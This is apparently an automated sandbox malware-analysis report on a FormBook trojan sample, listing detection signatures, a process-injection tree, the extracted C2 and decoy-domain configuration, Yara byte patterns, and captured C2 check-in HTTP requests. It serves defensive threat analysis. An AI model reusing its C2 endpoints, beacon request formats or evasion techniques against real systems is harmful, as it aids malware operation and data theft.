Loading ...

Play interactive tourEdit tour

Windows Analysis Report iAuPyHuUkk

Overview

General Information

Sample Name:iAuPyHuUkk (renamed file extension from none to exe)
Analysis ID:501991
MD5:6040407905ea1aa24dd58dc8befa4255
SHA1:96ecf27fd10a6663cbfaadb7643abeaf4061ea77
SHA256:2f2831bdecd1f925134fd944fc57f84b76ffe872e01c66f3662f1f9194a4b362
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • iAuPyHuUkk.exe (PID: 476 cmdline: 'C:\Users\user\Desktop\iAuPyHuUkk.exe' MD5: 6040407905EA1AA24DD58DC8BEFA4255)
    • iAuPyHuUkk.exe (PID: 6968 cmdline: C:\Users\user\Desktop\iAuPyHuUkk.exe MD5: 6040407905EA1AA24DD58DC8BEFA4255)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5980 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • control.exe (PID: 3540 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 4432 cmdline: /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.aliexpress-br.com/mexq/"], "decoy": ["cyebang.com", "hcswwsz.com", "50003008.com", "yfly624.xyz", "trungtamhohap.xyz", "sotlbb.com", "bizhan69.com", "brandmty.net", "fucibou.xyz", "orderinformantmailer.store", "nobleminers.com", "divinevoid.com", "quickappraisal.net", "adventuretravelsworld.com", "ashainitiativemp.com", "ikkbs-a02.com", "rd26x.com", "goraeda.com", "abbastanza.info", "andypartridge.photography", "xn--aprendes-espaol-brb.com", "jrceleste.com", "bestwarsawhotels.com", "fospine.online", "rayofdesign.online", "hablamarca.com", "nichellejonesrealtor.com", "zamarasystem.com", "thepropertygoat.com", "fightfigures.com", "mxconglomerate.com", "elecoder.com", "mabnapakhsh.com", "girlspiter.club", "xn--lcka2cufqed6765c4ef1x1g.xyz", "cancleaningpros.com", "galestorm.net", "besrbee.com", "sjmdesignstudio.com", "kickonlines.com", "generateyourart.com", "promiseface.com", "searchingspacespot.com", "jovemmilionario.com", "paomovar.com", "dogiadunggiare.online", "uniqued.net", "glassrootsstudio.com", "rabenteec.com", "asistente-ti.com", "xn--l6qw76agwi5rjeuzk9q.com", "azapsolutions.com", "wmh3gk2fzw2m.biz", "districonio.com", "dapekdelivery.com", "vintagepaseo.com", "od0aew1pox.com", "iphone13promax.design", "texttheruffleddaisy.com", "umdasch-lagertechnik.com", "growthabove.com", "eltacorancherofoodtruck.com", "gafoodstamps.com", "mzalluom.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.iAuPyHuUkk.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.iAuPyHuUkk.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.iAuPyHuUkk.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
        • 0x16b18:$sqlite3text: 68 38 2A 90 C5
        • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
        0.2.iAuPyHuUkk.exe.33e3150.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          3.2.iAuPyHuUkk.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 6 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.aliexpress-br.com/mexq/"], "decoy": ["cyebang.com", "hcswwsz.com", "50003008.com", "yfly624.xyz", "trungtamhohap.xyz", "sotlbb.com", "bizhan69.com", "brandmty.net", "fucibou.xyz", "orderinformantmailer.store", "nobleminers.com", "divinevoid.com", "quickappraisal.net", "adventuretravelsworld.com", "ashainitiativemp.com", "ikkbs-a02.com", "rd26x.com", "goraeda.com", "abbastanza.info", "andypartridge.photography", "xn--aprendes-espaol-brb.com", "jrceleste.com", "bestwarsawhotels.com", "fospine.online", "rayofdesign.online", "hablamarca.com", "nichellejonesrealtor.com", "zamarasystem.com", "thepropertygoat.com", "fightfigures.com", "mxconglomerate.com", "elecoder.com", "mabnapakhsh.com", "girlspiter.club", "xn--lcka2cufqed6765c4ef1x1g.xyz", "cancleaningpros.com", "galestorm.net", "besrbee.com", "sjmdesignstudio.com", "kickonlines.com", "generateyourart.com", "promiseface.com", "searchingspacespot.com", "jovemmilionario.com", "paomovar.com", "dogiadunggiare.online", "uniqued.net", "glassrootsstudio.com", "rabenteec.com", "asistente-ti.com", "xn--l6qw76agwi5rjeuzk9q.com", "azapsolutions.com", "wmh3gk2fzw2m.biz", "districonio.com", "dapekdelivery.com", "vintagepaseo.com", "od0aew1pox.com", "iphone13promax.design", "texttheruffleddaisy.com", "umdasch-lagertechnik.com", "growthabove.com", "eltacorancherofoodtruck.com", "gafoodstamps.com", "mzalluom.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: iAuPyHuUkk.exeReversingLabs: Detection: 15%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Antivirus detection for URL or domainShow sources
            Source: http://www.cyebang.com/mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5Avira URL Cloud: Label: malware
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: iAuPyHuUkk.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: iAuPyHuUkk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe, 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp
            Source: Binary string: control.pdb source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe
            Source: Binary string: control.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.vintagepaseo.com
            Source: C:\Windows\explorer.exeDomain query: www.brandmty.net
            Source: C:\Windows\explorer.exeDomain query: www.iphone13promax.design
            Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80
            Source: C:\Windows\explorer.exeDomain query: www.umdasch-lagertechnik.com
            Source: C:\Windows\explorer.exeDomain query: www.districonio.com
            Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.226 80
            Source: C:\Windows\explorer.exeNetwork Connect: 154.216.110.149 80
            Source: C:\Windows\explorer.exeDomain query: www.cyebang.com
            Source: C:\Windows\explorer.exeDomain query: www.xn--aprendes-espaol-brb.com
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.aliexpress-br.com/mexq/
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.vintagepaseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.xn--aprendes-espaol-brb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1Host: www.cyebang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpString found in binary or memory: http://en.w
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Left.png)
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Right.png)
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.Vintagepaseo.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: iAuPyHuUkk.exe, 00000000.00000003.357814039.000000000639D000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html9
            Source: explorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com8
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.N
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.Z
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: iAuPyHuUkk.exe, 00000000.00000003.360703238.0000000006395000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: iAuPyHuUkk.exe, 00000000.00000003.360703238.0000000006395000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmll
            Source: iAuPyHuUkk.exe, 00000000.00000003.360377419.0000000006395000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: iAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
            Source: iAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.come.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
            Source: iAuPyHuUkk.exe, 00000000.00000003.351807780.000000000637B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: iAuPyHuUkk.exe, 00000000.00000003.354702125.000000000636B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn7
            Source: iAuPyHuUkk.exe, 00000000.00000003.362371401.0000000006395000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000003.362345727.0000000006395000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: iAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: iAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: iAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//e
            Source: iAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ico
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: iAuPyHuUkk.exe, 00000000.00000003.357744601.0000000006395000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: iAuPyHuUkk.exe, 00000000.00000003.351987416.000000000637B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comc
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/All_Inclusive_Vacation_Packages.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeV
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/Credit_Card_Application.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/Migraine_Pain_Relief.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/Top_10_Luxury_Cars.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJI
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/Work_from_Home.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIpKi%
